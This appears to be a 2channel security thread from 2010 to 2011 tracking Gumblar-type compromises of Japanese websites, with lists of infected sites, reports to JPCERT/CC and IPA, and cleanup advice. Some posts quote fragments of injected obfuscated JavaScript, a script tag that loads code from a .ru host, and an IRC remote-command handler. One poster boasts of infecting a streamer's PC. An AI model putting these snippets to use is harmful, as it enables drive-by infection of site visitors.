2010/11/07(日) 08:14:500516名無しさん@お腹いっぱい。
2010/11/07(日) 20:45:54http://megalodon.jp/pc/history
0517名無しさん@お腹いっぱい。
2010/11/08(月) 18:14:070518名無しさん@お腹いっぱい。
2010/11/09(火) 21:44:43lovecosme●sakura●ne●jp/04-05
mirai-inc●net
prim-co●sakura●ne●jp
kajitakashi●sakura●ne●jp
moninet●sakura●ne●jp/ampleur-mania
e-cabinet●sakura●ne●jp/heb
77mail●sakura●ne●jp
barkays●sakura●ne●jp
ontheperch●sakura●ne●jp
sigoto-design●sakura●ne●jp
さくらに数ヶ月前に通報したけど反応なし
スパムメールの転送とか、リンク切れで危険度低
[2年連続で「.jp」は世界で最も安全な国別ドメインと評価 / 株式会社日本レジストリサービス(JPRS)]
http://jprs.co.jp/press/2010/101027.html
0519名無しさん@お腹いっぱい。
2010/11/11(木) 14:14:10現在有効な感染の確認方法は無いでしょうか?
0520名無しさん@お腹いっぱい。
2010/11/11(木) 14:16:14だからみんな困ってる
0521名無しさん@お腹いっぱい。
2010/11/11(木) 15:24:220522名無しさん@お腹いっぱい。
2010/11/11(木) 16:52:29駆除はともかく発見だけなら
bitdefenderとEmsisoftEmergencyKitのコマンドラインスキャンと
常駐アンチウイルスソフトによるCドライブのスキャンならいいのでは
対応してれば何とかなると思うけどだめかな
0523名無しさん@お腹いっぱい。
2010/11/11(木) 17:33:40未知の脆弱性を見つけるような連中だから
主要なウイルス対策ソフトに発見されないように拡散前にチェックしているかと。
0524名無しさん@お腹いっぱい。
2010/11/11(木) 17:38:27ただ修正されてないだけで
0525名無しさん@お腹いっぱい。
2010/11/11(木) 17:41:01すぐにそれを付くマルウェアが出てくる
発表しない方が良いくらいにも思える
0526名無しさん@お腹いっぱい。
2010/11/11(木) 17:43:13セキュリティソフトは必要最低限の備えであって過信していいもんじゃないよ
基本的にはできる範囲で他の対策も行わないと意味がない
といっても回避策のないゼロデイ攻撃が発生しちゃうと正直どうしようもないね
でもだいたい回避策あるけどね
0527名無しさん@お腹いっぱい。
2010/11/11(木) 17:48:06それが一番じゃないかな
0528名無しさん@お腹いっぱい。
2010/11/11(木) 17:48:15分かってねえくせに知ったかよしてくれ
0529名無しさん@お腹いっぱい。
2010/11/11(木) 18:04:29現在ゼロデイ中のAdobe Reader(Acrobat)には回避策はあるが
結局は脆弱性の内容によるらからな
0530名無しさん@お腹いっぱい。
2010/11/11(木) 20:23:280531名無しさん@お腹いっぱい。
2010/11/12(金) 18:13:18すでに攻撃受けてるみたいだね
それらしい報告あがってたわ
0532名無しさん@お腹いっぱい。
2010/11/12(金) 19:44:150533名無しさん@お腹いっぱい。
2010/11/12(金) 20:34:560534名無しさん@お腹いっぱい。
2010/11/14(日) 09:37:12https://www-950.ibm.com/blogs/tokyo-soc/entry/ie-0day_20101108?lang=ja
0535名無しさん@お腹いっぱい。
2010/11/15(月) 16:25:39(JPCERT コーディネーションセンター 研究・調査レポート)
http://www.jpcert.or.jp/research/#webdefacement
0536名無しさん@お腹いっぱい。
2010/11/15(月) 22:00:23fb742cde7f13f6aa9678cb7ab0ebac982a527d3d
0537名無しさん@お腹いっぱい。
2010/11/15(月) 22:38:55>TIA及び当羽田空港支店はフライトシミュレータ上の架空航空会社(VA)であります。
f45●aaa●livedoor●jp/~haneda/
→tour1●htm
→staff1●htm
他にも・・・
・がんぶらー
・8080
・<script>var XepaZerc=
・<script>function 〜
・fff.op.replace (468)
・がんぶらーっぽいの(最下部)
0538/名無しさん[1-30] ◆.htmlint.U
2010/11/16(火) 01:07:34とりぷるあにつーほ。
0539名無しさん@お腹いっぱい。
2010/11/20(土) 16:32:390540名無しさん@お腹いっぱい。
2010/11/21(日) 22:45:040541名無しさん@お腹いっぱい。
2010/11/22(月) 17:51:21こんなに沢山入っているホテルというのもね。
こんなところに止まったら個人情報心配
0542名無しさん@お腹いっぱい。
2010/11/22(月) 19:41:01>>541
これは悪質ですね。絞り込んでいませんが、、、
File name: www.isumiskyhotel.com.txt Submission date: 2010-11-22 09:19:37 (UTC) Result: 27/ 42 (64.3%)
http://www.virustotal.com/file-scan/report.html?id=3805f290f0b19e19ec2f4753fcdb5e6001770f05dd6f574a2b1f05685c309a29-1290417577
http://maps.google.co.jp/maps/place?hl=ja&um=1&ie=UTF-8&q=%E3%81%84%E3%81%99%E3%81%BF%E3%82%B9%E3%82%AB%E3%82%A4%E3%83%
9B%E3%83%86%E3%83%AB&fb=1&gl=jp&hq=%E3%81%84%E3%81%99%E3%81%BF%E3%82%B9%E3%82%AB%E3%82%A4%E3%83%9B%E3%83%86%E3%83%
AB&hnear=%E3%81%84%E3%81%99%E3%81%BF%E3%82%B9%E3%82%AB%E3%82%A4%E3%83%9B%E3%83%86%E3%83%AB&cid=10998837259304234162
電凸してみました。
「ごつごうかけているところはございません」
「大丈夫ですよ」 だそうです。
意味が分かりません。対応終了。
0543名無しさん@お腹いっぱい。
2010/11/22(月) 20:15:32/ ,. -――- 、 l 〃
┏┓ ┏━━┓┏━┓ ┏┓ ┏┳┓ //: : : : !\:_:|:_: \/ハ ┏┓┏┓
┏┛┗┓┃┏┓┃┗━╋┳┓┃┗━┻╋┛ ┏┓ 〃: : :!、: : :|/∨ヘ : : !ヽ| ┃┃┃┃
┗┓┏┛┃┗┛┃┏━┻╋┛┃┏┓┏┛┏┓ ┃┃┏━ f: : |斗-\| '下ハミV h: :! .━━━━┓ ┃┃┃┃
┏┛┗┓┃┏┓┃┗┓┏┛ ┗┛┃┃ ┃┃ ┃┃┃ |: : ハ マり |: :リ、: \ . ┃ ┃┃┃┃
┗┓┏┛┗┛┃┃ ┃┃ ┃┃ ┗┛┏┛┃┗━ lハハい == , . へ |: :l: 、\: \ __━┛ ┗┛┗┛
┃┃ ┃┃┏┛┃ ┏┛┃ ┏━┛┏┛ }ハ く{ }/|: :|\\\: : : : `\ .┏┓┏┓
┗┛ ┗┛┗━┛ ┗━┛ ┗━━┛ /;|: |>r--rf |: :l- 、\\\ ̄`\\┗┛┗┛
0544名無しさん@お腹いっぱい。
2010/11/23(火) 00:10:30警察に通報したほうが良いと思ふ。
0545名無しさん@お腹いっぱい。
2010/11/23(火) 12:16:130546名無しさん@お腹いっぱい。
2010/11/23(火) 19:27:020547/名無しさん[1-30] ◆.htmlint.U
2010/11/23(火) 21:38:28おつぅ。
おしんにメル。
0548名無しさん@お腹いっぱい。
2010/11/24(水) 20:44:44通販サイトだが
グーグルのセーフブラウジングによると怪しい
0549名無しさん@お腹いっぱい。
2010/11/24(水) 21:57:15んー今は警告でてないようですが
「最後に検出されたのは2010-09-21」となってて時間が立ちすぎとる
***.shop-pro.jp のアドレスで個々にショップ運営できるようなので、
その中のどっかが過去にやられたとか?
0550名無しさん@お腹いっぱい。
2010/11/24(水) 22:12:590551548
2010/11/25(木) 00:19:36気が付くのが遅れて無念だ
トップページは大丈夫そうだか
これではどこがやられたかかわからん
>>550
他のサイトへのリンク先がやられた可能性もあるな
0552名無しさん@お腹いっぱい。
2010/11/25(木) 09:29:31http://www.itmedia.co.jp/news/articles/1011/25/news026.html
0553名無しさん@お腹いっぱい。
2010/11/25(木) 13:07:24初心者の意見ですみません
私は通販をよく利用するのですが
例えば「***.shop-pro.jp」のそこの個人の場所自体がセーフブラウジングで過去にやられてなければ
その通販サイトは現段階までは安全ということでしょうか
私としては更新も対策もしていますが、自分が感染してなくても
サイトの方がやられて個人情報が漏れることも有り得るのですよね?
0554名無しさん@お腹いっぱい。
2010/11/25(木) 13:51:12特定の個人商店だけが被害にあってただけなら他は問題ない
全体がやられてたならアウト
現時点では被害範囲が判断不能なのでなんともいえない
通販サイトを利用してる時点で個人情報漏洩の危険性は認識してなきゃいけない
絶対安全なサイトなんて無いです
0555名無しさん@お腹いっぱい。
2010/11/25(木) 14:05:52個人情報に関しては社員・派遣・契約社員が漏えいするという人的危険とこういう技術的危険があるね
トロイなり、Gumblarなりウイルスが仕組まれているのに気付かない、放置してる会社は
技術的にも人的にも個人情報漏えいリスクが高そうだ
0556名無しさん@お腹いっぱい。
2010/11/25(木) 16:58:26>悪用はローカルでのみ可能
0557名無しさん@お腹いっぱい。
2010/11/25(木) 19:16:29少なくともshop-pro.jp本家の管理人は2ヶ月の間に対策したのかな?
とにかく杜撰な管理が多いな
0558名無しさん@お腹いっぱい。
2010/11/25(木) 19:40:090559名無しさん@お腹いっぱい。
2010/11/26(金) 11:33:56shiprip●com/sponge/bob/i/index●html
→<script>var NehQen=
→<script>function aY
新型っぽいの
<script>win=window;gar=win['String'];ga='l';g=win['eva'+ga];sf=ga.rfromCharCode;g(sf(4.5*2,52.5*2,51*2,16*2,20*2・・・・・中略・・・・・))</script>
※装填されてるサイトのURLは非公開とす
0560名無しさん@お腹いっぱい。
2010/11/26(金) 11:58:27たぶんここだぬ
izu-shizen●shop-pro●jp/
ここ見ればわかるんじゃね?
izu●sakura●ne●jp/
※がんぶらーっぽいのが装填中w
0561名無しさん@お腹いっぱい。
2010/11/26(金) 14:26:12satokk●co●jp
criminal●co●jp Gumblar.X
motif●jp
www●la-palmedor●com/patis-shop●html Gumblar.X
ここなんかは、お薬さんスパムのリダイレクトページがある
i-medical●co●jp/ration73●html
0562/名無しさん[1-30] ◆.htmlint.U
2010/11/26(金) 16:51:56おしん…
作業に入るお。。。
0563名無しさん@お腹いっぱい。
2010/11/26(金) 17:41:16www●soyo-pet●com
www●trickys-custom●net
www●ando-kagu●com
www●fairwayinc●jp
www●heisei-tech●com
tensou●daishin-inc●jp
www●100yen●co●jp
interior-myhouse●com
royal-cbj●jp
www●ltsgo●co●jp
matsuri●co●jp
www●yamaharu-tosou●co●jp
www●matsudakagu●co●jp←これなんかよく見る家具メーカだけど連絡しても全く無視
0564/名無しさん[1-30] ◆.htmlint.U
2010/11/26(金) 19:27:18さっきまであったけど一番下404になっちゃたのね。なのでつーほしませんでした。
他、おしんとJPCERT/CC、情報処理推進機構(IPA)セキュリティセンター(ISEC)につーほ。
>>563
うげげ、目が逝っちゃうお。。。
0565名無しさん@お腹いっぱい。
2010/11/26(金) 22:03:29ttp://qb5.2ch.net/test/read.cgi/operate/1290578495/859
でも、Vista+IE8だと、IEがXSSを検出してスクリプトの動作を制限するので影響うけず
IE7以下やFirefixだとアウト?
0566名無しさん@お腹いっぱい。
2010/11/27(土) 20:03:340567/名無しさん[1-30] ◆.htmlint.U
2010/11/29(月) 02:20:43一番下、今繋がった。
飛び先はチェックサイトを蹴っている模様。
おしんとかにつーほ。
0569名無しさん@お腹いっぱい。
2010/11/29(月) 16:56:27www*geocities*jp/feb1710/index*html
====
こんな書き込みもあるくらいだから本人は何もしないのでしょう。
デジロックでなければ、こんなサイトは表示停止にしてもらえる
のだが。。。。
0570名無しさん@お腹いっぱい。
2010/12/01(水) 00:46:22ttp://japan.cnet.com/news/business/story/0,3800104746,20423501,00.htm
Microsoft Windows のRtlQueryRegistryValues() 関数におけるレジストリデータ検証不備の脆弱性
ttp://jvn.jp/cert/JVNVU529673/
>2010年11月29日現在、対策方法はありません。
どうすんだよこれwww
0571名無しさん@お腹いっぱい。
2010/12/01(水) 02:21:220572名無しさん@お腹いっぱい。
2010/12/01(水) 08:07:180573名無しさん@お腹いっぱい。
2010/12/01(水) 11:23:150574名無しさん@お腹いっぱい。
2010/12/01(水) 11:30:520575名無しさん@お腹いっぱい。
2010/12/01(水) 13:52:52…ってことだろw
0576名無しさん@お腹いっぱい。
2010/12/01(水) 20:21:590577名無しさん@お腹いっぱい。
2010/12/01(水) 23:29:54キー監視なんてまだ有情だな
0578名無しさん@お腹いっぱい。
2010/12/01(水) 23:30:44巻き添え規制が長かったもんで・・・
0579名無しさん@お腹いっぱい。
2010/12/02(木) 02:37:510580名無しさん@お腹いっぱい。
2010/12/03(金) 03:10:39ダイワ包材株式会社
www●daiwa-pf●co●jp/
↓
<script>var QaSehalo=2
<script>function aY
0581/名無しさん[1-30] ◆.htmlint.U
2010/12/03(金) 05:00:36>>580
おちゅ。
そこのメアドと鯖缶とおしんとJPCERT/CCとIPAとNTT-CERTにつーほ。
0582/名無しさん[1-30] ◆.htmlint.U
2010/12/03(金) 05:50:49サイト内検索したら、まだいぱーいあたぁ。。。orz.....
0583名無しさん@お腹いっぱい。
2010/12/03(金) 15:51:21絶賛放置中につき再掲載
www●snowfan-mimo●com/area/area-service●asp?sID=500 など
絶賛放置中なゴミサイトは消滅すべき
0584名無しさん@お腹いっぱい。
2010/12/03(金) 22:23:52あれはyoutubeの広告のリンク先のサイトでもやられたのか?
0585名無しさん@お腹いっぱい。
2010/12/03(金) 22:34:300586名無しさん@お腹いっぱい。
2010/12/04(土) 01:13:06ゴミだけ蹴って、自分自身でアクセスするものは通してくれるから便利だぞ
0587名無しさん@お腹いっぱい。
2010/12/04(土) 10:04:02それは初心者の質問スレで聞いた方がよくね?
0588名無しさん@お腹いっぱい。
2010/12/05(日) 11:13:06それを初心者池で蹴るのはこのスレの用途の否定じゃないか?
0589名無しさん@お腹いっぱい。
2010/12/05(日) 18:31:05www48●tok2●com/home/karawasuichi/
↓
・Jsunpack
5f6ec9a74fc14cb25efe818a81cfb9605bda288c
↓
「download●XXXXX●jp/」
※腹筋注意w
0591名無しさん@お腹いっぱい。
2010/12/06(月) 21:56:28株式会社 電研端子製作所
www●denken-t●co●jp/eng/qa/qa●asp
※初代(?)Gumblar
日本一の幼稚園 日本一の子育てを応援する津久井幼稚園
www●tkg1152●sakura●ne●jp/photo/200709/070907/img13●html
※初代(?)Gumblar
下 反応なし
0593/名無しさん[1-30] ◆.htmlint.U
2010/12/07(火) 07:58:39乙です。
それぞれつーほしますた。
0594名無しさん@お腹いっぱい。
2010/12/07(火) 15:36:54取扱注意
>顛峰グループ(Sofmit Group)は〜〜中略〜〜中国西部においてソフトウェアアウトソーシング業界No.1の企業です。
・求人情報
en●sofmit●com/jp/Career/DetailsSub●aspx
↓
<script src=http://www●errghr●ru/script●js></script>
ウイルスバスターと同じく、下から数えてNo.1ということですねw
>エクセルテンプレート・ワードテンプレート無料ダウンロード
www4●atpages●jp/kaisya/
※旧8080(難読化)
感染率の高い企業のザルPCを「無料」というエサで釣ってトロイ(無料)をバラ撒いてたのかw
どーでも良いけど、禿の検索エンジンが帝國のやつになったら探しにくくなたーよ orz
0595/名無しさん[1-30] ◆.htmlint.U
2010/12/07(火) 22:02:39ノ
上:こちらの環境ではメルが戻ってきます。JPCERT/CCとIPAに気体
下:atpagesとかにつーほ。
0596名無しさん@お腹いっぱい。
2010/12/08(水) 23:20:04さすが「ろりぽ」というとこでしょうかね?
0597名無しさん@お腹いっぱい。
2010/12/09(木) 20:47:250598名無しさん@お腹いっぱい。
2010/12/11(土) 10:12:37>>5のテンプレに
これも加えようぜ
Exploit - AVG
ttp://linkscanner.explabs.com/linkscanner/default.aspx
0599名無しさん@お腹いっぱい。
2010/12/11(土) 11:47:58ttp://x68000.q-e-d.net/~68user/Cgi-room/#source
こんなのもあるね
0600名無しさん@お腹いっぱい。
2010/12/11(土) 19:14:38ここの対策も有効か
ttp://ponco2garage.blog111.fc2.com/blog-entry-68.html
0601名無しさん@お腹いっぱい。
2010/12/11(土) 21:21:292ヶ月くらい寝てたのか?
冬眠するにゃ早過ぎるような気がするが・・
今現在は、どっかのサーバー(特に広告関連)をハクってばら撒くのが主流だから
確実に防ぐ方法というものは存在しない。
どうしてもADPで防ぎたいならhttp://* ←これを入れておけよw
「驚きの白さ」
0602名無しさん@お腹いっぱい。
2010/12/12(日) 02:16:000603名無しさん@お腹いっぱい。
2010/12/12(日) 03:40:410604名無しさん@お腹いっぱい。
2010/12/12(日) 09:30:410605名無しさん@お腹いっぱい。
2010/12/12(日) 10:13:54このバージョンじゃないけど、ぜいじゃく性を悪用する処理を
積んだExploitKitが存在するから、入れてるPCは更新必須
>>600
1月に書かれた記事でもう古くて不完全な情報だよん
AdBlockは単に"軽減"という程度のレベル
改竄されるのは何も広告だけでないし
範囲も限定的で、たとえばメールとかIM経由なら出る幕がなし
基本的な対策は>>2-3
これ以上もこれ以下もないん (ゼロデイ攻撃は除く)
0606名無しさん@お腹いっぱい。
2010/12/12(日) 19:33:010607名無しさん@お腹いっぱい。
2010/12/12(日) 22:54:55そんな面倒な事するくらいならGoogle Chrome使えよw
0608名無しさん@お腹いっぱい。
2010/12/12(日) 23:01:21Secure Browserが良いよ
0609名無しさん@お腹いっぱい。
2010/12/12(日) 23:14:12そのセーフブラウジングも「Google は過去 90 日の間、このサイトを巡回していません。」
という場合があるよなw
やっぱりこの場合はは危険かどうかわからないってことなのかな?
0610名無しさん@お腹いっぱい。
2010/12/13(月) 16:05:23自分のWEBサイトがガンブラーに感染してると。
調べてみたらひとつ怪しいファイルがあったので削除。
Windowsのアップデート〜adobe関係までアップデート。
ウイルスソフトでウイルスチェック。
WEBホストのパスワードをすべて変更。
嫌気が刺したんで他のWEBアカウントデータもすべてホスト側から削除。
これでよろしいでしょうか?
0611名無しさん@お腹いっぱい。
2010/12/13(月) 16:30:44PCリカバリ。
0612名無しさん@お腹いっぱい。
2010/12/13(月) 16:43:03> 調べてみたらひとつ怪しいファイルがあったので削除。
このファイルはどうやって持ち込まれたと思ってるの?
それに対する対策はしたの?
0613名無しさん@お腹いっぱい。
2010/12/13(月) 17:10:580614名無しさん@お腹いっぱい。
2010/12/13(月) 17:59:35サイトは自分のPCが完全にクリーンな状態になるまで完全閉鎖
感染が疑われるPCは、HDを他のPCに繋いで検査すること
他のPC〜ができないなら迷わずリカバリ
PCがキレイになったら、>>2-3を実施(ずっと継続する)+パスワード変更とか・・
サイトのトップページに【お詫び】を掲載
※閲覧者に対して、感染の有無の確認(ウイルススキャン)をお願いする
0615名無しさん@お腹いっぱい。
2010/12/13(月) 18:06:19早くHP閉鎖しろカス!!!!!!!!!!!1
0616名無しさん@お腹いっぱい。
2010/12/13(月) 18:06:34HTMLファイルは手元のファイルとサーバー側で変更がないかちゃんと確認した?
Javaランタイムはアップデートした?
他のすべてのインストールソフトに対してアップデートを確認した?
OSわからんけどWindowsUpdateじゃなくMicrosoftUpdateでやった?
Webアカウントにはフリーメールも含まれてるわけだけどそのへんもパス変えた?
LAN内に他にPCはないの?
ウイルスでウイルスチェックしても意味ないよ
セキュリティ対策ソフトが入ってるなら期限が切れてないことが大前提
0618名無しさん@お腹いっぱい。
2010/12/13(月) 20:59:06クリーンインストールやってもだめなんじゃないの?
Cドライブにシステム、データ他はパーティション切るか
別ドライブで「D」以降にって人が多いと思うけど
システムドライブだけきれいになっても
データドライブにWEBのファイルがある人は、
そのドライブに改鼠されたデータが残ってたらどうなるの?
これ最強 しかしHDDがそのうち物故割れるという諸刃の刃
0620名無しさん@お腹いっぱい。
2010/12/13(月) 23:26:33サーバー側のデータをFTP経由で改竄してるだけだよ
もしローカル側のデータを改ざんされたとしてもそれはバージョン管理ソフトや
バックアップとの差分を見ればわかるとおもう
そういうのがないなら入念に確認して下さいとしかいえん
万が一改ざんデータがローカルに残っててもそれだけではどうにもならない
アップロードされ直してその後も動く状況なら被害者が増えるだけ
>>619
そういうの関係なく壊れるときは壊れます
0621名無しさん@お腹いっぱい。
2010/12/14(火) 01:52:43企業のサイトなんかは連絡しても「何それ?」って返ってくるし
0622名無しさん@お腹いっぱい。
2010/12/14(火) 07:40:08ローカル保存のHTMLも改竄って記憶があるんだけど、これじゃなかった?
0623名無しさん@お腹いっぱい。
2010/12/14(火) 17:35:27うーん、できれば感染していた時のaguseの結果が見たかった
0624名無しさん@お腹いっぱい。
2010/12/16(木) 13:26:080625名無しさん@お腹いっぱい。
2010/12/16(木) 15:51:32puredress●com
ニュー速運用情報から http://抜きだとエラー
0627名無しさん@お腹いっぱい。
2010/12/19(日) 01:01:26プロセルピナ・プロジェクト
ttp://www.traceability-center.com/proserpineProject.html
試用版=無期限(一部機能に制限あり)
「プロセルピナ」のAntiAd機能をテストするためのテストページ
ttp://sound.jp/antilink_testpage/cut_jscript_includingEval.html
0628名無しさん@お腹いっぱい。
2010/12/20(月) 13:09:26ttp://internet.watch.impress.co.jp/docs/news/20101220_415942.html
0629名無しさん@お腹いっぱい。
2010/12/22(水) 03:21:030630名無しさん@お腹いっぱい。
2010/12/22(水) 20:38:22s0.2mdn●net/879366/flashwright_1_2●js
という奴が見つかるのだが
0631名無しさん@お腹いっぱい。
2010/12/22(水) 20:41:09s0.2mdn●net/879366/flashwriht_1_2●js
0632名無しさん@お腹いっぱい。
2010/12/22(水) 20:44:28404
0633630
2010/12/22(水) 21:01:29また間違えた
aguseで見つかったのはこれです
s0.2mdn●net/879366/flashwrite_1_2●js
0634名無しさん@お腹いっぱい。
2010/12/22(水) 21:48:16どこがヤバイの?
0635名無しさん@お腹いっぱい。
2010/12/22(水) 21:50:06VirusTotalでも問題ないようだがな
ttp://www.virustotal.com/url-scan/report.html?id=25c8407eea8955f8d55d2e54129e10fe-1293018038
ttp://www.virustotal.com/file-scan/report.html?id=ecd3969cd8b93aa0fab45d1b054866f0342109aec1e41bd2d39575460ec5b1f0-1293021846
0636630
2010/12/22(水) 21:52:54『s0.2mdn.net/879366/flashwrite_1_2.js』でググってみると
なんだか危険そうな雰囲気なんだが…
0637名無しさん@お腹いっぱい。
2010/12/22(水) 21:59:350638名無しさん@お腹いっぱい。
2010/12/23(木) 00:28:17これかにゃ?
ttp://forums.liveleak.com/showthread.php?p=882808
>well if you are quick and crank up fiddler and check any of the the flash links
listed at the top out then you will note that a script file from http://s0●2mdn●net/879366/flashwrite_1_2●js
is loaded up and this script includes a function called dclkFlashWrite that simply does
a document.write(script string) that redirects to pre-loader.
(以下略
0639名無しさん@お腹いっぱい。
2010/12/23(木) 17:59:43数日前に突然消えて、恐くてアクセス出来ない・・
0640名無しさん@お腹いっぱい。
2010/12/23(木) 18:02:010641名無しさん@お腹いっぱい。
2010/12/23(木) 19:14:20ありがと。
0643(VдV) ◆yUyb3Tqn92
2010/12/26(日) 19:59:03そしてこのスレURL晒しながらも悪用厳禁とか書いてる奴は本当に矛盾してて頭悪いな
(VдV)♪
0644(VдV) ◆yUyb3Tqn92
2010/12/26(日) 19:59:53俺様はまだ一度も逮捕されてないお(Vд^)-☆調子に乗り乗りですお!
0645名無しさん@お腹いっぱい。
2010/12/27(月) 11:26:21他人にウイルスは踏ませたことがないな
0647名無しさん@お腹いっぱい。
2010/12/27(月) 23:36:33↑
0648名無しさん@お腹いっぱい。
2010/12/28(火) 00:18:04現在知恵袋では新手の偽セキュリティソフトが大流行していると
各自別IDも総動員して書き込みしてる有名な一派がいるんだけど
ほんとにこいつらがこんなに大騒ぎするようなこと現在起こってるの?
0649名無しさん@お腹いっぱい。
2010/12/28(火) 00:48:550650名無しさん@お腹いっぱい。
2010/12/28(火) 00:53:25そんなリンク見る気にもならないけど実際に発生しているのは事実
0651名無しさん@お腹いっぱい。
2010/12/28(火) 11:10:04そのグループ回答者たちの各回答見ると「○○さんの〜」みたいに自分たちが発見・紹介してる
みたいな記述してるのが笑えるし少し引いたw
各質問に回答してる解決法もいかにも自分たちだけができるみたいな書き方だしw
別にそんな回りくどいやり方殊更偉そうに別IDまだ作って宣伝しなくても
さっさとバックアップしてリカバリすればいいだけの話じゃねぇ?
0652名無しさん@お腹いっぱい。
2010/12/28(火) 14:27:21何このキチガイ
これ全部一人の自演?
0653名無しさん@お腹いっぱい。
2010/12/28(火) 22:34:57>>648
改行厨にアフィアドレス誘導ワロタ
0654名無しさん@お腹いっぱい。
2010/12/28(火) 22:54:59何が最敬礼だよ
キモ過ぎる
0655名無しさん@お腹いっぱい。
2010/12/29(水) 09:28:080656名無しさん@お腹いっぱい。
2010/12/29(水) 11:03:03出さない注意喚起なんてチェーンメールのデマみたいだ。
0657名無しさん@お腹いっぱい。
2010/12/29(水) 19:05:43aguseでクロ判定
0658名無しさん@お腹いっぱい。
2010/12/30(木) 12:02:280659名無しさん@お腹いっぱい。
2010/12/30(木) 12:17:10www●soyo-pet●com
www●trickys-custom●net
oak-co●net
www●himawarinosato●or●jp
www●soyo-pet●com
www●ltsgo●co●jp
interior-myhouse●com
/royal-cbj●jp
www●paohouse●co●jp
www●yamaharu-tosou●co●jp
motif●jp
satokk●co●jp
0660名無しさん@お腹いっぱい。
2010/12/30(木) 20:12:39今日知った。google先生さすがだぜ
0661名無しさん@お腹いっぱい。
2010/12/31(金) 00:23:52ttp://www.google.com/safebrowsing/diagnostic?site=addonrock●ru&hl=ja
>Google が最後にこのサイトを巡回したのは2010-12-30で、
このサイトで不審なコンテンツが最後に検出されたのは2010-12-30です。
addonrock●ru/(省略)●jsを突いてみた
日本からのアクセス→まったく繋がらない(IP変えても×、国内の串を通しても×)
海外の串→繋がることがあるがファイルは落ちてこなかった
※2回目以降のアクセスは404
Gumblar(.x/亜種)と同じくGeoIPで国ごと蹴ってるのかね?
0662(VдV) ◆yUyb3Tqn92
2011/01/02(日) 09:28:570663名無しさん@お腹いっぱい。
2011/01/02(日) 10:45:08(VдV)FF14のニコ生でブラクラ踏ませてきた
http://live.nicovideo.jp/watch/co473160
FF14実況中の馬鹿にウィルス入りのブラクラ踏ませた
↓
そのショックで主のPC固まる&主の精神も固まり中
↓
最初は主をフォローしてたリスナーも飽きて他いった
↓
放送の延長(有料)が自動で行われてること判明
つまりPC固まってるのに有料の延長が無駄に使われて生主涙目状態←今ここ
(VДV)ざまああああああああああああああああああ!!!!!!
でへへへ、俺様マジGJでしょ(*VдV*)
0664名無しさん@お腹いっぱい。
2011/01/02(日) 11:27:230665名無しさん@お腹いっぱい。
2011/01/02(日) 12:30:54ウェブメール使おうと今日見たらこんな風に…。
aguseでは反応無かったし、大丈夫だと良いんだが…。
ttp://exout.net/mail/
0666名無しさん@お腹いっぱい。
2011/01/02(日) 12:46:22分かったからコテかBeつけて書き込んでよ
0667名無しさん@お腹いっぱい。
2011/01/02(日) 13:02:32これを見ていた人はウイルス対策の必要性を思い知っただろうな
いつの日かこのような悪事をはたらいても無意味になることを祈ろう
0668名無しさん@お腹いっぱい。
2011/01/02(日) 13:16:59被害届けとかも出せるんじゃない?例え捨てアカでも
0669名無しさん@お腹いっぱい。
2011/01/02(日) 22:36:190670名無しさん@お腹いっぱい。
2011/01/02(日) 23:46:55>>1読めカス
0671(VдV) ◆yUyb3Tqn92
2011/01/03(月) 03:02:55無知が多くて笑えるな(>w<)新年早々上機嫌お☆
0672名無しさん@お腹いっぱい。
2011/01/03(月) 04:57:29ほれ見たことか!
そうやってコテに反応するからまたコテの思い通りになってんだろ!死ね!!!
0673名無しさん@お腹いっぱい。
2011/01/03(月) 05:17:51とnet-worm.kidoもはやってるよ
ネットワームはkk.zipで駆除できる
http://support.kaspersky.co.jp/faq/?qid=193238801
実はmstmpに感染してたんだ
タスクマネイジャーを起動
プロセスにmstmp.exeを停止
アンチでブート検査、ルート検査を実行
0674名無しさん@お腹いっぱい。
2011/01/03(月) 06:46:38説明下手だなおい
0675名無しさん@お腹いっぱい。
2011/01/03(月) 08:58:41そういう同僚とたまにメールしてるからよくわかる
0676名無しさん@お腹いっぱい。
2011/01/03(月) 09:32:520677名無しさん@お腹いっぱい。
2011/01/03(月) 17:49:19自分の中で勝手に完結しててまったく説明になってない素晴らしい例だ
こういうのって脳の障害じゃないのかな
新年早々良いものを見ることができて感動した
0678(VдV) ◆yUyb3Tqn92
2011/01/03(月) 19:08:58過去に俺様が指摘したような
悪用厳禁と書きながらhと.だけ外しただけの危険URLひたすら貼ってる馬鹿とか
ウィルス入りサイトのURLを故意に踏ませたら逮捕されるとか思っちゃってる哀れな無知とかな
┐(VДV)┌ 偽善者ほど醜いものはねーぜ!
んな中途半端なことしてねーで、どうせなら悪用推薦!って書くようするか、死ね!
0679(VдV) ◆yUyb3Tqn92
2011/01/03(月) 19:18:13最近、朝起きると
とても高濃度な痰が出る
恐らくウィルスが含まれているのだろう
それを10階のベランダから吐くのがすっかり日課になってる
何が言いたいのかというとだ
俺様はウィルスを踏ませることもあれば降らせることも・・ry
Σ(VДV )\(>w<)ったねぇよ!
0680(VдV) ◆yUyb3Tqn92
2011/01/03(月) 19:19:12680じゃん
数字の8が大好きおヽ(VдV)ノおっおW
0681名無しさん@お腹いっぱい。
2011/01/04(火) 07:27:52やべ・・ちょっと面白いと思っちまったじゃねーか!
高速道路でコンクリート上から落としてきた!って書いたら通報もんだけど
痰の場合はどうなんだろうなwwww
0682名無しさん@お腹いっぱい。
2011/01/04(火) 08:21:080683名無しさん@お腹いっぱい。
2011/01/04(火) 12:01:28たんじゃなく精子だったら通報だろ
0684名無しさん@お腹いっぱい。
2011/01/04(火) 17:37:12面白いなあ
0685名無しさん@お腹いっぱい。
2011/01/04(火) 19:50:16452 :動け動けウゴウゴ2ちゃんねる:2010/07/10(土) 15:53:49.30 ID:7Cr427LS0
>>440
・プロバイダの新しい有料メールアドレス
・ジャパンネットバンク銀行の使い捨て番号のVISAデビット
ニ.フ.ティ.ーの100円のメアドプラスで認証が通った。
認証できたら、メアドプラスは登録解除してOK。
普通のクレジットカードでは漢字の住所が登録できたが、
ジャパンネットバンク銀行のVISAデビットだとローマ字入力の住所を要求された。
ローマ字の書き方はこれ
ヘボン式ローマ字綴方表
http://www.seikatubunka.metro.tokyo.jp/hebon/
漢字住所でどんな順序でどんなローマ字、番地の番号を使ったかは、
メモ帳でメアド・パスワードと一緒に控えておいたほうがいい。
453 :動け動けウゴウゴ2ちゃんねる:2010/07/10(土) 15:55:00.00 ID:t966sYmN0
ローマ字変換
eip=eip+unescape("%u7030%u4300")
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
n0=on 900:text:!exec*:*:{.notice $nick Execut comanda: $2-
http://www2u.biglobe.ne.jp/~yuichi/rest/kanarome.html
